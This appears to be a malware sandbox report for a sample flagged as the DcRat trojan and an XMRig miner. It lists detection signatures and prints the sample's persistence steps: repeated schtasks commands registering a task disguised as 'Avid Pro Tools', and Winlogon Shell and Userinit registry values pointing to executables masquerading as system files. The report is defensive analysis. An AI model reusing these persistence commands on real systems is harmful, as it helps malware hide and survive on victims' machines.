SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

Network

Country Destination Domain Proto

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-07-21 20:24

Reported

2024-07-21 20:26

Platform

win10v2004-20240709-en

Max time kernel

25s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

xmrig

miner xmrig

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Event Triggered Execution: AppInit DLLs

persistence privilege_escalation

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Result.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
